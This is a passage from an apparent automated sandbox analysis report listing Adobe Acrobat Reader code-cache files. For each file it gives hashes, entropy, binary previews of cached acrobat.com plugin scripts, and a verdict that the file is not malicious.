SSDEEP:	6:ms2gEYOFLvEWdGQRQVu2I2dlkuQdFt1TK6tgx2s2gEYOFLvEWdGQRQVunTKrEQdZ:B2geRHRQTLdlku0C32geRHRQaP0
MD5:	EBD05094C69ED2D0BD7BE452D1257F76
SHA1:	C1318A5471CA1F67C37FEEEF1187E50823E8050D
SHA-256:	A4B20D8F9FEEDDCFEF5A87A1CBC6A79D2A42A40EDF7D216B18A215224A93F82F
SHA-512:	6AEEB59F9D89E63FA01899E0645F462D9422AE3D6FEDD51799473E0BBEC65A2377F33AB74C7012380490BA15112100C153486EAD80BC940D49B51B980E827212
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ...../)/....."#.D0.6.xJ.A@..{o]...9o\|..qY....T....{..u.b..A..Eo...................A..Eo.......~.,........0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js .(Gv./)/....."#.D....xJ.A@..{o]...9o\|..qY....T....{..u.b..A..Eo...................A..Eo.......t..........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	618
Entropy (8bit):	5.617953464605737
Encrypted:	false
SSDEEP:	12:WyeRlgWEt1wCEyeRlaAt1w4eyeRlfRt1w:WJIzfw3JSAfw4eJHRfw
MD5:	D4CFA073B80DB415CD57BE4FF5CA416B
SHA1:	2B874CB1CC13AC4E3318994DACEEA7F39EE58C49
SHA-256:	780F98308F12489FD0C6C946E9AD24BB32F5A04C8FBF8BF98451213E076C76B1
SHA-512:	9254E9273FAE5D491C6AAF4D7D5B43F8A3680297B32A8E2EAEBBFE0A216610434FF2BB1F59E2B2BDDC35F8F6AD0C9ACC8F2325624DAA714BC1F3D829F188B63C
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ..Y./)/....."#.Da.B.xJ.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo......"..s........0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ...i./)/....."#.Dh..xJ.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo....... .B........0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .. ~./)/....."#.D....xJ.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo........;.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	436
Entropy (8bit):	5.612625407215704
Encrypted:	false
SSDEEP:	6:mnYOFLvEWdhwyulErm9zqrqwK+41TK6tynYOFLvEWdhwyu0mo3rqwK+41TK6tS9/:wRhnm9zqGwK+EWRh5mo3GwK+EC
MD5:	F2E491CD6EB00F72A6F30D9548C762CC
SHA1:	74C4431B9AE5D18EDB9F16A1481CBA2CB158E59D
SHA-256:	0904151A13A074478AC52CF084F962344DF1BBE134053546087A098EF85E801E
SHA-512:	4670FFCF6F4E2885C50C9C5BAA91370BABE0ADA1D349E86F18598BB83D20AF5510DD656410541DC7D9AE3BAD304C12B2FAFACB631070A90753D781BED8E1A67C
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ..../)/....."#.D;..xJ.A.......7...o..a=.98I......(3.$G.A..Eo...................A..Eo.................0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ..;m./)/....."#.D.M..xJ.A.......7...o..a=.98I......(3.$G.A..Eo...................A..Eo.........B........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	690
Entropy (8bit):	5.608820561443068
Encrypted:	false
SSDEEP:	12:/RrROk/ml3fLEulRrROk/5QfLElvRrROk/7rfLE0t:/PJ/ml4ulPJ/5Q4lvPJ/X48
MD5:	EB2A79D1A819ECC9F6D77FCD6D5F5104
SHA1:	6092D6E159B9F83DC2189CB40DC7462C70A7F4AD
SHA-256:	87DA66570CD04187B811241B843899C69BE63347CFEC8A256DACCD1470CD3F3D
SHA-512:	200DE4F78F33F2C483B851BA1EEB5B552C338A55F9621E2186C4A2CBFE813969304AA635B2ABF033046F4701AB809788841C81268D17455528116B29E479194D
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..W./)/....."#.D..B.xJ.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo......%MW0........0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ...i./)/....."#.DJ...xJ.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo......_...........0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js .\.~./)/....."#.D....xJ.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo........a.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	558
Entropy (8bit):	5.618676666531586
Encrypted:	false
SSDEEP:	12:xqTnRKgJKCPLnRBqT6RSJr2CPLnRrqTAU2CPLn:ALwaKMnRQH2MncL2Mn
MD5:	699FA84B76D966DC627134A2A866C27B
SHA1:	EB68C9F44EF5C842858E2E07D6F5D49C73F1AA7C
SHA-256:	F11776733E7934DC87C1B517DF4C95FF78720A4B8D6B57C0A65A1A8A7ADBE0F7
SHA-512:	2E363591FFF6E68CA86EE372005E2561C4B6D7A6959D1B4FA9CFFC54C455FBE84E51ABC0DF4A18653F395C8C880361C8B54B3BC5432543374C06A7471B3A62EC
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..../)/....."#.D.4.xJ.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo.......$U8........0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ...e./)/....."#.D..xJ.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo.......}..........0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ...u./)/....."#.D6#..xJ.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo......h.Q.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	621
Entropy (8bit):	5.606678561333762
Encrypted:	false
SSDEEP:	6:m52YOFLvEWdMAuqLAsEJ41TK6tu+52YOFLvEWdMAufkIsEJ41TK6tdke52YOFLvj:zRMwAsDcRMdkIsDTk7RMOdYwIsD
MD5:	BAC2BC16905E133DC21CD88B300C01B5
SHA1:	6D3952465803194F88B2A058222BB2E9FF2D51AF
SHA-256:	081BE4B34BF74F20383DB7AC6E98E8742E7878C15640F0933AEB57759C7B1DFB
SHA-512:	7F5F9B3F4277B6F687CD6943FC3899CE820DAF43564C65368ECFC891F4677C7C660103B8FDF5CB417AE741BF5D623DC3DED8518761A92791C402049CEC63301B
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ..'E./)/....."#.D.V6.xJ.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo.......Vrt........0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ./.v./)/....."#.Ds...xJ.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo.................0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .o.../)/....."#.DV.-.xJ.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo........`.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	630
Entropy (8bit):	5.576865828756199
Encrypted:	false
SSDEEP:	6:mYilPYOFLvEWd8CAdAui9RGgFong1TK6ti8YilPYOFLvEWd8CAdAuoxbpFong1Tk:6lJR99RGgFoMjlJRLVFoMMlJRNFoM
MD5:	136A33DE090D1CE1E388684C2099ACEF
SHA1:	9CCEFF3331531664425B378FA07D7115F913A519
SHA-256:	F2E4EDE77345DA0272DE028A623AD7BB66D3D3EBC690264CA65DB55AA2926389
SHA-512:	A93890368F78490AF2DCA70E786CEEE8A69C71BFEC5A1B7C89D4A830D651A41EDDFA5EC85DE51BD1B912A47688B7E13B9852EE131C1A884E865BA8EDC15C165F
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......R....\|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ...E./)/....."#.D.n6.xJ.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo......,\|FW........0\r..m......R....\|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .zIw./)/....."#.DxC..xJ.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo.......1h.........0\r..m......R....\|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .../)/....."#.D^.-.xJ.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo......;7Hp........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	669
Entropy (8bit):	5.610252534371559
Encrypted:	false
SSDEEP:	12:F8hRrROk/+/ve2o8hRrROk/elH1e2B8hRrROk/RmH1e29:UPJ/+m2xPJ/ow2oPJ/RmHw29
MD5:	ADBABD204A2067D232ABFBEC0097A0E5
SHA1:	D8A5BE1D117FF6902AFF99D96121EA62FC9C5221
SHA-256:	9A4416FD4315B68D4DC9B1647AC09E2B876FAFFA7D7DBAD3E670B6EBC26533F2
SHA-512:	FBEBE3CC4AF0E1460B15DF8D43762B834E72C06150F7596005F67A6F735C81455AA183F5DA360805267A60FA11BEBAC4F3B389EF3FF0AF8B976F0CA6DE7164C7
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..../)/....."#.D..A.xJ.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo........\|.........0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ...i./)/....."#.D....xJ.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo......P.6.........0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ...}./)/....."#.D.p..xJ.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo........)"........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	639
Entropy (8bit):	5.6923977497259886
Encrypted:	false
SSDEEP:	12:ehRclsqrNJICeuhRc3JcXrNJIC6hRcAhgrNJIC:ehCRJICeuhyeJIC6hHhsJIC
MD5:	C30B31CA00F24905BEA63EB4A64623EA
SHA1:	44F88CA8A23203FA843D715EF1A97E5A6BE3AD27
SHA-256:	2ADF26E573DD3E410EBFB93B121A86BC8CCB58B91E89C3D65FDFF4EEAE61EE7C
SHA-512:	D732BD03561BB5C37B8AB8F131B749103DDCB364C914C38010614B3B37D6A6CD6EC1FBF0BEC27849752EE386AFD794560C37C0C511BECCC9566D4BBF7D8C5631
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..\./)/....."#.D.SB.xJ.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo........i........0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js .mpj./)/....."#.D...xJ.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo.................0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js .0"~./)/....."#.D...xJ.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo.......h3.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	624
Entropy (8bit):	5.579286102595472
Encrypted:	false
SSDEEP:	6:mOEYOFLvEWdrIhu9Wu/ZLzgm2d/1TK6tK+OEYOFLvEWdrIhuxnmas9Pk/ZLzgm2F:0RWuZReDRbmas1kZRedRTGgkZReTH
MD5:	717DC7CC8160EB592F25DA3A78E54CE1
SHA1:	7D755A62F41AE06A62C623BB8D4A740F4CCA76A1
SHA-256:	E12534F9C8C43985E7FA5CD9F94172478974E96272916AF2FD3DBBA1C3E6577E
SHA-512:	A05CD1A995DB9F6E7E221C459EA6A523B83BFD93D05F402EA8E23123055C02D6625856B21C4F4DA6B781C4DBA52BAB7EB40E0ABA9B3B0CF6277864202B3FD9E6
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .?../)/....."#.D..A.xJ.AZ.Z}Q..4.o....0+..[\|..n:..U.W.A..Eo...................A..Eo.......P..........0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .>.h./)/....."#.D.j..xJ.AZ.Z}Q..4.o....0+..[\|..n:..U.W.A..Eo...................A..Eo......~{eE........0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .&.}./)/....."#.D.)..xJ.AZ.Z}Q..4.o....0+..[\|..n:*..U.W.A..Eo...................A..Eo....../e".........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	480
Entropy (8bit):	5.619282274289258
Encrypted:	false
SSDEEP:	6:mAElVYOFLvEW1K8XK/WWyhkx56uvp1TK6tEAElVYOFLvEW1KP+yhkx56uvp1TK6L:6JJKo7KmJJKPiQmwVi
MD5:	D8A7CDDE18828476CC7D76B51C6EE37E
SHA1:	4DC9C58DC96930AC0E9834F7896DE9BEEDD6767A
SHA-256:	3E5F1188108317FD7319841F9A4326639BC3A8734DA0EE8DA188ABDF0CD6463E
SHA-512:	FABB26091378EDA511A3675A04CA530863BEC3EA2C619B957D8FB498127BC9D3BA6974A7F1C726489C7CBE72F4832F3F2667CF850E9C1E19AF215163C64B264A
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .sK./)/....."#.D....xJ.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo.........1........0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ...P./)/....."#.D.N\.xJ.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo........mp........m8X./)/....."#.D..e.xJ.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo........6b........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.651977003752751
Encrypted:	false
SSDEEP:	6:mWYOFLvEWdBJvvufUyhUDLYtmOZn1TK6tVEWYOFLvEWdBJvvuHFtjyhUDLYtmOZ5:xRBJcUHDcFZLHRBJ+jHDcFZL
MD5:	6DAE716C7D98167499956DEFA577C65D
SHA1:	8566C873A3EE7C990D1CCB99CAD6E1BB0786EB5A
SHA-256:	3772CBC9E387BE241F116CDB8503B9D5384FE3D89D3F7B779CE685AE18027575
SHA-512:	8504BE78CB3E0884DD0197D7C24203E98F736AE62924183E82EC95DA656AD708E07E399B3A64B8939E8031CE7AC1F551F91BFB34545F9CA51373D5D35403D042
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ...../)/....."#.D.56.xJ.A....t.q..W.EZ....1...[.zC.7mD..A..Eo...................A..Eo........M@........0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js .I.v./)/....."#.DZb..xJ.A....t.q..W.EZ....1...[.zC.7mD..A..Eo...................A..Eo........!.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	633
Entropy (8bit):	5.598905110956211
Encrypted:	false
SSDEEP:	6:msRPYOFLvEWIa7zp75YXKaj7VPu1TK6tSXMsRPYOFLvEWIa7zp7B7VPu1TK6tism:BPHLYXH7ciPH3cnPHmxcG
MD5:	739CDF270A8F29D046CD08D4A5BBB816
SHA1:	F949F500C8A087B23EE15C774E23252B7530265B
SHA-256:	3FAF8C5A776910E65C112B43219863CA555B6E3C818AE3D6EB28E97FE5D86555
SHA-512:	50633DA4575AD779769924BDD151120BF0C4CEBAC5E239A0443C038313A00E5D07F9A0A650A97727FB20772B9A6592C4D3DC4FA9766A2717C9A636FCD92F127D
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .t)../)/....."#.D!Y..xJ.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo......P...........0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..*G./)/....."#.D....xJ.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo.......m4a........0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..zL./)/....."#.D..2.xJ.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo........-s........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	416
Entropy (8bit):	5.589687149077104
Encrypted:	false
SSDEEP:	6:mKPYOFLvEWdENU9QqhwiM3Y1TK6t4KPYOFLvEWdENU9QwwiM3Y1TK6tr:bJRT9Cr0TJRT9cr0
MD5:	E556F12B3571CDB11ED333623384F43A
SHA1:	0AE764908B3DA29CB1D847FE4E9BA287E5FBF9D5
SHA-256:	5139965B6BA5EEB228272CFA53A96DD8507AD1FA8D773C1232E81DD025C49712
SHA-512:	3D0BBC854781F5869C6B44F18CFB6A12BF4FF7608CF3F686B414053E7BD5B19CC1F6625A3FDCC94F27FFD21DAA0F74000C7BF898F4F461D9D648965DB04D0023
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ..../)/....."#.D....xJ.A...M....m+lS..e.....<7.U.P8.0K.A..Eo...................A..Eo........?........0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ..so./)/....."#.D)..xJ.A...M....m+lS..e.....<7.U.P8.0K.A..Eo...................A..Eo.........#........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	416
Entropy (8bit):	5.6293248475286815
Encrypted:	false
SSDEEP:	6:mQt6EYOFLvEWdccAHQIBjBRCh/41TK6tLOkleQt6EYOFLvEWdccAHQBg0k2jBRCx:XRc9dDi/EBOklfRc9Sg0hDi/E+
MD5:	C869BD2FB9FF60429284A7D0175A6F54
SHA1:	2F7AD3442BCC505A5E28D8721B80D3AAF97633B8
SHA-256:	43AF10BAA68F2AA6FEE6241E598B2EE997E084BFFADDD7A2C19E4D0422827F3F
SHA-512:	DE22A36DA976EF0AB08BEC3D9E6CC25700DD11359EA53A7E64440D9925E81299ACC2ED297946870A25A057832FA45E0C7A648E40537A4D89EEEA6B29346EA8F9
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ...H./)/....."#.D2uA.xJ.APJm...0x.x..RD...BB!@5..<..]....A..Eo...................A..Eo......~J.1........0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .q.{./)/....."#.DGU..xJ.APJm...0x.x..RD...BB!@5..<..]....A..Eo...................A..Eo.......}G.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.534109218143981
Encrypted:	false
SSDEEP:	6:mqs6XYOFLvEWdFCi5mhuZR4VULlF4r1TK6t:bs6xRkiN42LlF4n
MD5:	420092366D83FBC97284AFCB11F6407A
SHA1:	B41741DB1C764018A4B1FA505AA7313B3800EF84
SHA-256:	D9EADC4B7A1A38E8A7FE99E587D5C7420F2C9770BE2734B9D76CB1F51BF30F4E
SHA-512:	97194E4C181C8BFCB02FC1295264B1177B4F744B14A05914068F4EFFF3FE53E07BB71028A6ED9BDBF1D7F8F84512F5CD41117BEB8D750F00065D0EBF2DC98339
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js ...../)/....."#.D3p..xJ.A.P...#4..l....5...5..).w.. .h.~..A..Eo...................A..Eo.......4..........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.528441482658038
Encrypted:	false
SSDEEP:	6:mhYOFLvEWd/aFuzUaXVN941TK6ttaMhYOFLvEWd/aFus+sN941TK6tZll:WRdUalN9ErjRG+sN9E/ll
MD5:	BE5A6A6D6EFCB237818923A78FA418F2
SHA1:	F470C6E46FCF3D24CA1F5D11A175FCDFB90C9A42
SHA-256:	13D7B06C9314537FA59D58DB5DE454823F93D6CB5967F171A4568709E5D734D4
SHA-512:	6BF214DCA9DA8781EA9783D45F21A26537671EC2905F3293040DF44F7CB0DCD2FD9B569BF45895496248F470A4CD713BA775FD0BECF73118F4E011D6D47EB1D2
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js .<8J./)/....."#.Dq.K.xJ.A...a.f.m.i.o.p..3U5.....^...I.A..Eo...................A..Eo........f.........0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ..../)/....."#.D$c..xJ.A...a.f.m.i.o.p..3U5.....^...I.A..Eo...................A..Eo......g..c........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	416
Entropy (8bit):	5.576526839976663
Encrypted:	false
SSDEEP:	6:mR9YOFLvEWd7VIGXOdQ36fPZoBMqVd3G4K41TK6txR9YOFLvEWd7VIGXOdQYoBMx:2DRuRDnyB9Vd2kxDRuRiB9Vd2kwl
MD5:	A4908C16FD3BFE42FDE221A85C0BA96A
SHA1:	2DFF7987EE44547799325CB7107DD90582451EF2
SHA-256:	886EED1B4CC7A22461BEB9790F45B6AABFFDAD55F0566C7789741AD15FB00EED
SHA-512:	F3638190E2FFC917AA3C44E24731B424F8B7A66C4FF63F5BE62A72D146C1D884BFF7E54E7BC36658552CA1F8D0931D64FD8C724EE6CBAC1164538066622F93B6
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ...I./)/....."#.DCtK.xJ.A..y.$..$.v5j...T...z.]..._S....A..Eo...................A..Eo......V%O.........0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ...~./)/....."#.DR,..xJ.A..y.$..$.v5j...T...z.]..._S....A..Eo...................A..Eo......%I.J........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	624
Entropy (8bit):	5.640928735007842
Encrypted:	false
SSDEEP:	6:mkqYOFLvEWd8CAd9Qj/JlmuA424r1TK6tnMkqYOFLvEWd8CAd9Q8K1suA424r1Tk:+RQgJlZrn18RQW1PrnufRQiVPrn3T
MD5:	69E5DC73862A926EC9E055813E1823D5
SHA1:	1ED32049563171BA3E65FAEF0C0662AC169B5FBC
SHA-256:	9E67066E262A0CED058BE029A1EA9783024338775A26C8481E263EC9A3796BCC
SHA-512:	2A9FAE88D12EACD15A7137529A10CE7866D4E5D5C42284A7EEFE2ABDF0DA4DD61D4BECBD62FCB6ECA88C570CA4D65FD7791F8F144650BC0625706783E535BFA1
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...I./)/....."#.D..M.xJ.A#..@..k(v.8g..5.~_....]Pj...6.A..Eo...................A..Eo......G..#........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...~./)/....."#.D....xJ.A#..@..k(v.8g..5.~_....]Pj...6.A..Eo...................A..Eo.......7`.........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .f../)/....."#.Dx.4.xJ.A#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo...................A..Eo..................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	420
Entropy (8bit):	5.57318143081034
Encrypted:	false
SSDEEP:	6:moXXYOFLvEWdENUAuXukDAyC8n1TK6t3plEoXXYOFLvEWdENUAuOiQI+AyC8n1TD:xhRTVDA7QfZhRTp3+A7Q
MD5:	2688A6C44336D75C7599464A6A39D3B4
SHA1:	318CEF3184A5698E9AC4CE009F6B5B8C1F6B624F
SHA-256:	44D7BD9AE027F34565A926D083CCB72E6C6EB2D2C9943635B081DF8625959F4C
SHA-512:	66AF092BF975868D60B1512A7190766C129551399D23085DB0A5329FDE97442B5D059A092BCEEB09D19D930823E617866305BF63BA125EEA94B94D831E384892
Malicious:	false
Reputation:	unknown
